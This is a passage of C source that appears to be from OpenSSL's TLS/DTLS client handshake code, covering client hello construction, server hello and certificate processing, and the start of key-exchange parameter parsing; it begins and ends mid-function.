SSL3_ST_CW_FINISHED_A,SSL3_ST_CW_FINISHED_B,
s->method->ssl3_enc->client_finished_label,
s->method->ssl3_enc->client_finished_label_len);
if (ret <= 0) goto end;
s->state=SSL3_ST_CW_FLUSH;
/* clear flags */
s->s3->flags&= ~SSL3_FLAGS_POP_BUFFER;
if (s->hit)
{
s->s3->tmp.next_state=SSL_ST_OK;
if (s->s3->flags & SSL3_FLAGS_DELAY_CLIENT_FINISHED)
{
s->state=SSL_ST_OK;
s->s3->flags|=SSL3_FLAGS_POP_BUFFER;
s->s3->delay_buf_pop_ret=0;
}
}
else
{
#ifndef OPENSSL_NO_TLSEXT
/* Allow NewSessionTicket if ticket expected */
if (s->tlsext_ticket_expected)
s->s3->tmp.next_state=SSL3_ST_CR_SESSION_TICKET_A;
else
#endif
s->s3->tmp.next_state=SSL3_ST_CR_FINISHED_A;
}
s->init_num=0;
break;
#ifndef OPENSSL_NO_TLSEXT
case SSL3_ST_CR_SESSION_TICKET_A:
case SSL3_ST_CR_SESSION_TICKET_B:
ret=ssl3_get_new_session_ticket(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_CR_FINISHED_A;
s->init_num=0;
break;
case SSL3_ST_CR_CERT_STATUS_A:
case SSL3_ST_CR_CERT_STATUS_B:
ret=ssl3_get_cert_status(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_CR_KEY_EXCH_A;
s->init_num=0;
break;
#endif
case SSL3_ST_CR_FINISHED_A:
case SSL3_ST_CR_FINISHED_B:
s->s3->flags |= SSL3_FLAGS_CCS_OK;
ret=ssl3_get_finished(s,SSL3_ST_CR_FINISHED_A,
SSL3_ST_CR_FINISHED_B);
if (ret <= 0) goto end;
if (s->hit)
s->state=SSL3_ST_CW_CHANGE_A;
else
s->state=SSL_ST_OK;
s->init_num=0;
break;
case SSL3_ST_CW_FLUSH:
s->rwstate=SSL_WRITING;
if (BIO_flush(s->wbio) <= 0)
{
ret= -1;
goto end;
}
s->rwstate=SSL_NOTHING;
s->state=s->s3->tmp.next_state;
break;
case SSL_ST_OK:
/* clean a few things up */
ssl3_cleanup_key_block(s);
if (s->init_buf != NULL)
{
BUF_MEM_free(s->init_buf);
s->init_buf=NULL;
}
/* If we are not 'joining' the last two packets,
* remove the buffering now */
if (!(s->s3->flags & SSL3_FLAGS_POP_BUFFER))
ssl_free_wbio_buffer(s);
/* else do it later in ssl3_write */
s->init_num=0;
s->renegotiate=0;
s->new_session=0;
ssl_update_cache(s,SSL_SESS_CACHE_CLIENT);
if (s->hit) s->ctx->stats.sess_hit++;
ret=1;
/* s->server=0; */
s->handshake_func=ssl3_connect;
s->ctx->stats.sess_connect_good++;
if (cb != NULL) cb(s,SSL_CB_HANDSHAKE_DONE,1);
goto end;
/* break; */
default:
SSLerr(SSL_F_SSL3_CONNECT,SSL_R_UNKNOWN_STATE);
ret= -1;
goto end;
/* break; */
}
/* did we do anything */
if (!s->s3->tmp.reuse_message && !skip)
{
if (s->debug)
{
if ((ret=BIO_flush(s->wbio)) <= 0)
goto end;
}
if ((cb != NULL) && (s->state != state))
{
new_state=s->state;
s->state=state;
cb(s,SSL_CB_CONNECT_LOOP,1);
s->state=new_state;
}
}
skip=0;
}
end:
s->in_handshake--;
if (buf != NULL)
BUF_MEM_free(buf);
if (cb != NULL)
cb(s,SSL_CB_CONNECT_EXIT,ret);
return(ret);
}
int ssl3_client_hello(SSL *s)
{
unsigned char *buf;
unsigned char *p,*d;
int i;
unsigned long l;
int al = 0;
#ifndef OPENSSL_NO_COMP
int j;
SSL_COMP *comp;
#endif
buf=(unsigned char *)s->init_buf->data;
if (s->state == SSL3_ST_CW_CLNT_HELLO_A)
{
SSL_SESSION *sess = s->session;
if ((sess == NULL) ||
(sess->ssl_version != s->version) ||
!sess->session_id_length ||
(sess->not_resumable))
{
if (!ssl_get_new_session(s,0))
goto err;
}
if (s->method->version == DTLS_ANY_VERSION)
{
/* Determine which DTLS version to use */
int options = s->options;
/* If DTLS 1.2 disabled correct the version number */
if (options & SSL_OP_NO_DTLSv1_2)
{
if (tls1_suiteb(s))
{
SSLerr(SSL_F_SSL3_CLIENT_HELLO, SSL_R_ONLY_DTLS_1_2_ALLOWED_IN_SUITEB_MODE);
goto err;
}
/* Disabling all versions is silly: return an
* error.
*/
if (options & SSL_OP_NO_DTLSv1)
{
SSLerr(SSL_F_SSL3_CLIENT_HELLO,SSL_R_WRONG_SSL_VERSION);
goto err;
}
/* Update method so we don't use any DTLS 1.2
* features.
*/
s->method = DTLSv1_client_method();
s->version = DTLS1_VERSION;
}
else
{
/* We only support one version: update method */
if (options & SSL_OP_NO_DTLSv1)
s->method = DTLSv1_2_client_method();
s->version = DTLS1_2_VERSION;
}
s->client_version = s->version;
}
/* else use the pre-loaded session */
p=s->s3->client_random;
/* for DTLS if client_random is initialized, reuse it, we are
* required to use same upon reply to HelloVerify */
if (SSL_IS_DTLS(s))
{
size_t idx;
i = 1;
for (idx=0; idx < sizeof(s->s3->client_random); idx++)
{
if (p[idx])
{
i = 0;
break;
}
}
}
else
i = 1;
if (i)
ssl_fill_hello_random(s, 0, p,
sizeof(s->s3->client_random));
/* Do the message type and length last */
d=p= ssl_handshake_start(s);
/*-
* version indicates the negotiated version: for example from
* an SSLv2/v3 compatible client hello). The client_version
* field is the maximum version we permit and it is also
* used in RSA encrypted premaster secrets. Some servers can
* choke if we initially report a higher version then
* renegotiate to a lower one in the premaster secret. This
* didn't happen with TLS 1.0 as most servers supported it
* but it can with TLS 1.1 or later if the server only supports
* 1.0.
*
* Possible scenario with previous logic:
* 1. Client hello indicates TLS 1.2
* 2. Server hello says TLS 1.0
* 3. RSA encrypted premaster secret uses 1.2.
* 4. Handhaked proceeds using TLS 1.0.
* 5. Server sends hello request to renegotiate.
* 6. Client hello indicates TLS v1.0 as we now
* know that is maximum server supports.
* 7. Server chokes on RSA encrypted premaster secret
* containing version 1.0.
*
* For interoperability it should be OK to always use the
* maximum version we support in client hello and then rely
* on the checking of version to ensure the servers isn't
* being inconsistent: for example initially negotiating with
* TLS 1.0 and renegotiating with TLS 1.2. We do this by using
* client_version in client hello and not resetting it to
* the negotiated version.
*/
#if 0
*(p++)=s->version>>8;
*(p++)=s->version&0xff;
s->client_version=s->version;
#else
*(p++)=s->client_version>>8;
*(p++)=s->client_version&0xff;
#endif
/* Random stuff */
memcpy(p,s->s3->client_random,SSL3_RANDOM_SIZE);
p+=SSL3_RANDOM_SIZE;
/* Session ID */
if (s->new_session)
i=0;
else
i=s->session->session_id_length;
*(p++)=i;
if (i != 0)
{
if (i > (int)sizeof(s->session->session_id))
{
SSLerr(SSL_F_SSL3_CLIENT_HELLO, ERR_R_INTERNAL_ERROR);
goto err;
}
memcpy(p,s->session->session_id,i);
p+=i;
}
/* cookie stuff for DTLS */
if (SSL_IS_DTLS(s))
{
if ( s->d1->cookie_len > sizeof(s->d1->cookie))
{
SSLerr(SSL_F_SSL3_CLIENT_HELLO, ERR_R_INTERNAL_ERROR);
goto err;
}
*(p++) = s->d1->cookie_len;
memcpy(p, s->d1->cookie, s->d1->cookie_len);
p += s->d1->cookie_len;
}
/* Ciphers supported */
i=ssl_cipher_list_to_bytes(s,SSL_get_ciphers(s),&(p[2]),0);
if (i == 0)
{
SSLerr(SSL_F_SSL3_CLIENT_HELLO,SSL_R_NO_CIPHERS_AVAILABLE);
goto err;
}
#ifdef OPENSSL_MAX_TLS1_2_CIPHER_LENGTH
/* Some servers hang if client hello > 256 bytes
* as hack workaround chop number of supported ciphers
* to keep it well below this if we use TLS v1.2
*/
if (TLS1_get_version(s) >= TLS1_2_VERSION
&& i > OPENSSL_MAX_TLS1_2_CIPHER_LENGTH)
i = OPENSSL_MAX_TLS1_2_CIPHER_LENGTH & ~1;
#endif
s2n(i,p);
p+=i;
/* COMPRESSION */
#ifdef OPENSSL_NO_COMP
*(p++)=1;
#else
if (!ssl_allow_compression(s) || !s->ctx->comp_methods)
j=0;
else
j=sk_SSL_COMP_num(s->ctx->comp_methods);
*(p++)=1+j;
for (i=0; i<j; i++)
{
comp=sk_SSL_COMP_value(s->ctx->comp_methods,i);
*(p++)=comp->id;
}
#endif
*(p++)=0; /* Add the NULL method */
#ifndef OPENSSL_NO_TLSEXT
/* TLS extensions*/
if (ssl_prepare_clienthello_tlsext(s) <= 0)
{
SSLerr(SSL_F_SSL3_CLIENT_HELLO,SSL_R_CLIENTHELLO_TLSEXT);
goto err;
}
if ((p = ssl_add_clienthello_tlsext(s, p, buf+SSL3_RT_MAX_PLAIN_LENGTH, &al)) == NULL)
{
ssl3_send_alert(s,SSL3_AL_FATAL,al);
SSLerr(SSL_F_SSL3_CLIENT_HELLO,ERR_R_INTERNAL_ERROR);
goto err;
}
#endif
l= p-d;
ssl_set_handshake_header(s, SSL3_MT_CLIENT_HELLO, l);
s->state=SSL3_ST_CW_CLNT_HELLO_B;
}
/* SSL3_ST_CW_CLNT_HELLO_B */
return ssl_do_write(s);
err:
return(-1);
}
int ssl3_get_server_hello(SSL *s)
{
STACK_OF(SSL_CIPHER) *sk;
const SSL_CIPHER *c;
CERT *ct = s->cert;
unsigned char *p,*d;
int i,al=SSL_AD_INTERNAL_ERROR,ok;
unsigned int j;
long n;
#ifndef OPENSSL_NO_COMP
SSL_COMP *comp;
#endif
/* Hello verify request and/or server hello version may not
* match so set first packet if we're negotiating version.
*/
if (SSL_IS_DTLS(s))
s->first_packet = 1;
n=s->method->ssl_get_message(s,
SSL3_ST_CR_SRVR_HELLO_A,
SSL3_ST_CR_SRVR_HELLO_B,
-1,
20000, /* ?? */
&ok);
if (!ok) return((int)n);
if (SSL_IS_DTLS(s))
{
s->first_packet = 0;
if ( s->s3->tmp.message_type == DTLS1_MT_HELLO_VERIFY_REQUEST)
{
if ( s->d1->send_cookie == 0)
{
s->s3->tmp.reuse_message = 1;
return 1;
}
else /* already sent a cookie */
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_BAD_MESSAGE_TYPE);
goto f_err;
}
}
}
if ( s->s3->tmp.message_type != SSL3_MT_SERVER_HELLO)
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_BAD_MESSAGE_TYPE);
goto f_err;
}
d=p=(unsigned char *)s->init_msg;
if (s->method->version == DTLS_ANY_VERSION)
{
/* Work out correct protocol version to use */
int hversion = (p[0] << 8)|p[1];
int options = s->options;
if (hversion == DTLS1_2_VERSION
&& !(options & SSL_OP_NO_DTLSv1_2))
s->method = DTLSv1_2_client_method();
else if (tls1_suiteb(s))
{
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO, SSL_R_ONLY_DTLS_1_2_ALLOWED_IN_SUITEB_MODE);
s->version = hversion;
al = SSL_AD_PROTOCOL_VERSION;
goto f_err;
}
else if (hversion == DTLS1_VERSION
&& !(options & SSL_OP_NO_DTLSv1))
s->method = DTLSv1_client_method();
else
{
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_WRONG_SSL_VERSION);
s->version = hversion;
al = SSL_AD_PROTOCOL_VERSION;
goto f_err;
}
s->version = s->method->version;
}
if ((p[0] != (s->version>>8)) || (p[1] != (s->version&0xff)))
{
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_WRONG_SSL_VERSION);
s->version=(s->version&0xff00)|p[1];
al=SSL_AD_PROTOCOL_VERSION;
goto f_err;
}
p+=2;
/* load the server hello data */
/* load the server random */
memcpy(s->s3->server_random,p,SSL3_RANDOM_SIZE);
p+=SSL3_RANDOM_SIZE;
s->hit = 0;
/* get the session-id */
j= *(p++);
if ((j > sizeof s->session->session_id) || (j > SSL3_SESSION_ID_SIZE))
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_SSL3_SESSION_ID_TOO_LONG);
goto f_err;
}
#ifndef OPENSSL_NO_TLSEXT
/* check if we want to resume the session based on external pre-shared secret */
if (s->version >= TLS1_VERSION && s->tls_session_secret_cb)
{
SSL_CIPHER *pref_cipher=NULL;
s->session->master_key_length=sizeof(s->session->master_key);
if (s->tls_session_secret_cb(s, s->session->master_key,
&s->session->master_key_length,
NULL, &pref_cipher,
s->tls_session_secret_cb_arg))
{
s->session->cipher = pref_cipher ?
pref_cipher : ssl_get_cipher_by_char(s, p+j);
s->hit = 1;
}
}
#endif /* OPENSSL_NO_TLSEXT */
if (!s->hit && j != 0 && j == s->session->session_id_length
&& memcmp(p,s->session->session_id,j) == 0)
{
if(s->sid_ctx_length != s->session->sid_ctx_length
|| memcmp(s->session->sid_ctx,s->sid_ctx,s->sid_ctx_length))
{
/* actually a client application bug */
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_ATTEMPT_TO_REUSE_SESSION_IN_DIFFERENT_CONTEXT);
goto f_err;
}
s->hit=1;
}
/* a miss or crap from the other end */
if (!s->hit)
{
/* If we were trying for session-id reuse, make a new
* SSL_SESSION so we don't stuff up other people */
if (s->session->session_id_length > 0)
{
if (!ssl_get_new_session(s,0))
{
goto f_err;
}
}
s->session->session_id_length=j;
memcpy(s->session->session_id,p,j); /* j could be 0 */
}
p+=j;
c=ssl_get_cipher_by_char(s,p);
if (c == NULL)
{
/* unknown cipher */
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_UNKNOWN_CIPHER_RETURNED);
goto f_err;
}
/* Set version disabled mask now we know version */
if (!SSL_USE_TLS1_2_CIPHERS(s))
ct->mask_ssl = SSL_TLSV1_2;
else
ct->mask_ssl = 0;
/* If it is a disabled cipher we didn't send it in client hello,
* so return an error.
*/
if (ssl_cipher_disabled(s, c, SSL_SECOP_CIPHER_CHECK))
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_WRONG_CIPHER_RETURNED);
goto f_err;
}
p+=ssl_put_cipher_by_char(s,NULL,NULL);
sk=ssl_get_ciphers_by_id(s);
i=sk_SSL_CIPHER_find(sk,c);
if (i < 0)
{
/* we did not say we would use this cipher */
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_WRONG_CIPHER_RETURNED);
goto f_err;
}
/* Depending on the session caching (internal/external), the cipher
and/or cipher_id values may not be set. Make sure that
cipher_id is set and use it for comparison. */
if (s->session->cipher)
s->session->cipher_id = s->session->cipher->id;
if (s->hit && (s->session->cipher_id != c->id))
{
/* Workaround is now obsolete */
#if 0
if (!(s->options &
SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG))
#endif
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_OLD_SESSION_CIPHER_NOT_RETURNED);
goto f_err;
}
}
s->s3->tmp.new_cipher=c;
/* Don't digest cached records if no sigalgs: we may need them for
* client authentication.
*/
if (!SSL_USE_SIGALGS(s) && !ssl3_digest_cached_records(s))
goto f_err;
/* lets get the compression algorithm */
/* COMPRESSION */
#ifdef OPENSSL_NO_COMP
if (*(p++) != 0)
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_UNSUPPORTED_COMPRESSION_ALGORITHM);
goto f_err;
}
/* If compression is disabled we'd better not try to resume a session
* using compression.
*/
if (s->session->compress_meth != 0)
{
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_INCONSISTENT_COMPRESSION);
goto f_err;
}
#else
j= *(p++);
if (s->hit && j != s->session->compress_meth)
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_OLD_SESSION_COMPRESSION_ALGORITHM_NOT_RETURNED);
goto f_err;
}
if (j == 0)
comp=NULL;
else if (!ssl_allow_compression(s))
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_COMPRESSION_DISABLED);
goto f_err;
}
else
comp=ssl3_comp_find(s->ctx->comp_methods,j);
if ((j != 0) && (comp == NULL))
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_UNSUPPORTED_COMPRESSION_ALGORITHM);
goto f_err;
}
else
{
s->s3->tmp.new_compression=comp;
}
#endif
#ifndef OPENSSL_NO_TLSEXT
/* TLS extensions*/
if (!ssl_parse_serverhello_tlsext(s,&p,d,n))
{
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_PARSE_TLSEXT);
goto err;
}
#endif
if (p != (d+n))
{
/* wrong packet length */
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,SSL_R_BAD_PACKET_LENGTH);
goto f_err;
}
return(1);
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
err:
return(-1);
}
int ssl3_get_server_certificate(SSL *s)
{
int al,i,ok,ret= -1;
unsigned long n,nc,llen,l;
X509 *x=NULL;
const unsigned char *q,*p;
unsigned char *d;
STACK_OF(X509) *sk=NULL;
SESS_CERT *sc;
EVP_PKEY *pkey=NULL;
int need_cert = 1; /* VRS: 0=> will allow null cert if auth == KRB5 */
n=s->method->ssl_get_message(s,
SSL3_ST_CR_CERT_A,
SSL3_ST_CR_CERT_B,
-1,
s->max_cert_list,
&ok);
if (!ok) return((int)n);
if ((s->s3->tmp.message_type == SSL3_MT_SERVER_KEY_EXCHANGE) ||
((s->s3->tmp.new_cipher->algorithm_auth & SSL_aKRB5) &&
(s->s3->tmp.message_type == SSL3_MT_SERVER_DONE)))
{
s->s3->tmp.reuse_message=1;
return(1);
}
if (s->s3->tmp.message_type != SSL3_MT_CERTIFICATE)
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,SSL_R_BAD_MESSAGE_TYPE);
goto f_err;
}
p=d=(unsigned char *)s->init_msg;
if ((sk=sk_X509_new_null()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,ERR_R_MALLOC_FAILURE);
goto err;
}
n2l3(p,llen);
if (llen+3 != n)
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
for (nc=0; nc<llen; )
{
n2l3(p,l);
if ((l+nc+3) > llen)
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,SSL_R_CERT_LENGTH_MISMATCH);
goto f_err;
}
q=p;
x=d2i_X509(NULL,&q,l);
if (x == NULL)
{
al=SSL_AD_BAD_CERTIFICATE;
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,ERR_R_ASN1_LIB);
goto f_err;
}
if (q != (p+l))
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,SSL_R_CERT_LENGTH_MISMATCH);
goto f_err;
}
if (!sk_X509_push(sk,x))
{
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,ERR_R_MALLOC_FAILURE);
goto err;
}
x=NULL;
nc+=l+3;
p=q;
}
i=ssl_verify_cert_chain(s,sk);
if ((s->verify_mode != SSL_VERIFY_NONE) && (i <= 0)
#ifndef OPENSSL_NO_KRB5
&& !((s->s3->tmp.new_cipher->algorithm_mkey & SSL_kKRB5) &&
(s->s3->tmp.new_cipher->algorithm_auth & SSL_aKRB5))
#endif /* OPENSSL_NO_KRB5 */
)
{
al=ssl_verify_alarm_type(s->verify_result);
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,SSL_R_CERTIFICATE_VERIFY_FAILED);
goto f_err;
}
ERR_clear_error(); /* but we keep s->verify_result */
if (i > 1)
{
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE, i);
al = SSL_AD_HANDSHAKE_FAILURE;
goto f_err;
}
sc=ssl_sess_cert_new();
if (sc == NULL) goto err;
if (s->session->sess_cert) ssl_sess_cert_free(s->session->sess_cert);
s->session->sess_cert=sc;
sc->cert_chain=sk;
/* Inconsistency alert: cert_chain does include the peer's
* certificate, which we don't include in s3_srvr.c */
x=sk_X509_value(sk,0);
sk=NULL;
/* VRS 19990621: possible memory leak; sk=null ==> !sk_pop_free() @end*/
pkey=X509_get_pubkey(x);
/* VRS: allow null cert if auth == KRB5 */
need_cert = ((s->s3->tmp.new_cipher->algorithm_mkey & SSL_kKRB5) &&
(s->s3->tmp.new_cipher->algorithm_auth & SSL_aKRB5))
? 0 : 1;
#ifdef KSSL_DEBUG
fprintf(stderr,"pkey,x = %p, %p\n", pkey,x);
fprintf(stderr,"ssl_cert_type(x,pkey) = %d\n", ssl_cert_type(x,pkey));
fprintf(stderr,"cipher, alg, nc = %s, %lx, %lx, %d\n", s->s3->tmp.new_cipher->name,
s->s3->tmp.new_cipher->algorithm_mkey, s->s3->tmp.new_cipher->algorithm_auth, need_cert);
#endif /* KSSL_DEBUG */
if (need_cert && ((pkey == NULL) || EVP_PKEY_missing_parameters(pkey)))
{
x=NULL;
al=SSL3_AL_FATAL;
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,
SSL_R_UNABLE_TO_FIND_PUBLIC_KEY_PARAMETERS);
goto f_err;
}
i=ssl_cert_type(x,pkey);
if (need_cert && i < 0)
{
x=NULL;
al=SSL3_AL_FATAL;
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,
SSL_R_UNKNOWN_CERTIFICATE_TYPE);
goto f_err;
}
if (need_cert)
{
int exp_idx = ssl_cipher_get_cert_index(s->s3->tmp.new_cipher);
if (exp_idx >= 0 && i != exp_idx)
{
x=NULL;
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,
SSL_R_WRONG_CERTIFICATE_TYPE);
goto f_err;
}
sc->peer_cert_type=i;
CRYPTO_add(&x->references,1,CRYPTO_LOCK_X509);
/* Why would the following ever happen?
* We just created sc a couple of lines ago. */
if (sc->peer_pkeys[i].x509 != NULL)
X509_free(sc->peer_pkeys[i].x509);
sc->peer_pkeys[i].x509=x;
sc->peer_key= &(sc->peer_pkeys[i]);
if (s->session->peer != NULL)
X509_free(s->session->peer);
CRYPTO_add(&x->references,1,CRYPTO_LOCK_X509);
s->session->peer=x;
}
else
{
sc->peer_cert_type=i;
sc->peer_key= NULL;
if (s->session->peer != NULL)
X509_free(s->session->peer);
s->session->peer=NULL;
}
s->session->verify_result = s->verify_result;
x=NULL;
ret=1;
if (0)
{
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
}
err:
EVP_PKEY_free(pkey);
X509_free(x);
sk_X509_pop_free(sk,X509_free);
return(ret);
}
int ssl3_get_key_exchange(SSL *s)
{
#ifndef OPENSSL_NO_RSA
unsigned char *q,md_buf[EVP_MAX_MD_SIZE*2];
#endif
EVP_MD_CTX md_ctx;
unsigned char *param,*p;
int al,j,ok;
long i,param_len,n,alg_k,alg_a;
EVP_PKEY *pkey=NULL;
const EVP_MD *md = NULL;
#ifndef OPENSSL_NO_RSA
RSA *rsa=NULL;
#endif
#ifndef OPENSSL_NO_DH
DH *dh=NULL;
#endif
#ifndef OPENSSL_NO_ECDH
EC_KEY *ecdh = NULL;
BN_CTX *bn_ctx = NULL;
EC_POINT *srvr_ecpoint = NULL;
int curve_nid = 0;
int encoded_pt_len = 0;
#endif
/* use same message size as in ssl3_get_certificate_request()
* as ServerKeyExchange message may be skipped */
n=s->method->ssl_get_message(s,
SSL3_ST_CR_KEY_EXCH_A,
SSL3_ST_CR_KEY_EXCH_B,
-1,
s->max_cert_list,
&ok);
if (!ok) return((int)n);
if (s->s3->tmp.message_type != SSL3_MT_SERVER_KEY_EXCHANGE)
{
#ifndef OPENSSL_NO_PSK
/* In plain PSK ciphersuite, ServerKeyExchange can be
omitted if no identity hint is sent. Set
session->sess_cert anyway to avoid problems
later.*/
if (s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK)
{
s->session->sess_cert=ssl_sess_cert_new();
if (s->ctx->psk_identity_hint)
OPENSSL_free(s->ctx->psk_identity_hint);
s->ctx->psk_identity_hint = NULL;
}
#endif
s->s3->tmp.reuse_message=1;
return(1);
}
param=p=(unsigned char *)s->init_msg;
if (s->session->sess_cert != NULL)
{
#ifndef OPENSSL_NO_RSA
if (s->session->sess_cert->peer_rsa_tmp != NULL)
{
RSA_free(s->session->sess_cert->peer_rsa_tmp);
s->session->sess_cert->peer_rsa_tmp=NULL;
}
#endif
#ifndef OPENSSL_NO_DH
if (s->session->sess_cert->peer_dh_tmp)
{
DH_free(s->session->sess_cert->peer_dh_tmp);
s->session->sess_cert->peer_dh_tmp=NULL;
}
#endif
#ifndef OPENSSL_NO_ECDH
if (s->session->sess_cert->peer_ecdh_tmp)
{
EC_KEY_free(s->session->sess_cert->peer_ecdh_tmp);
s->session->sess_cert->peer_ecdh_tmp=NULL;
}
#endif
}
else
{
s->session->sess_cert=ssl_sess_cert_new();
}
/* Total length of the parameters including the length prefix */
param_len=0;
alg_k=s->s3->tmp.new_cipher->algorithm_mkey;
alg_a=s->s3->tmp.new_cipher->algorithm_auth;
EVP_MD_CTX_init(&md_ctx);
al=SSL_AD_DECODE_ERROR;
#ifndef OPENSSL_NO_PSK
if (alg_k & SSL_kPSK)
{
char tmp_id_hint[PSK_MAX_IDENTITY_LEN+1];
param_len = 2;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
/* Store PSK identity hint for later use, hint is used
* in ssl3_send_client_key_exchange. Assume that the
* maximum length of a PSK identity hint can be as
* long as the maximum length of a PSK identity. */
if (i > PSK_MAX_IDENTITY_LEN)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto f_err;
}
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_BAD_PSK_IDENTITY_HINT_LENGTH);
goto f_err;
}
param_len += i;
/* If received PSK identity hint contains NULL
* characters, the hint is truncated from the first
* NULL. p may not be ending with NULL, so create a
* NULL-terminated string. */
memcpy(tmp_id_hint, p, i);
memset(tmp_id_hint+i, 0, PSK_MAX_IDENTITY_LEN+1-i);
if (s->ctx->psk_identity_hint != NULL)
OPENSSL_free(s->ctx->psk_identity_hint);
s->ctx->psk_identity_hint = BUF_strdup(tmp_id_hint);
if (s->ctx->psk_identity_hint == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_MALLOC_FAILURE);
goto f_err;
}
p+=i;
n-=param_len;
}
else
#endif /* !OPENSSL_NO_PSK */
#ifndef OPENSSL_NO_SRP
if (alg_k & SSL_kSRP)
{
param_len = 2;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_N_LENGTH);
goto f_err;
}
param_len += i;
if (!(s->srp_ctx.N=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_G_LENGTH);
goto f_err;
}
param_len += i;
if (!(s->srp_ctx.g=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (1 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 1;
i = (unsigned int)(p[0]);
p++;
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_S_LENGTH);
goto f_err;
}
param_len += i;
if (!(s->srp_ctx.s=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_B_LENGTH);
goto f_err;
}
param_len += i;
if (!(s->srp_ctx.B=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
n-=param_len;
if (!srp_verify_server_param(s, &al))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_PARAMETERS);
goto f_err;
}
/* We must check if there is a certificate */
#ifndef OPENSSL_NO_RSA
if (alg_a & SSL_aRSA)
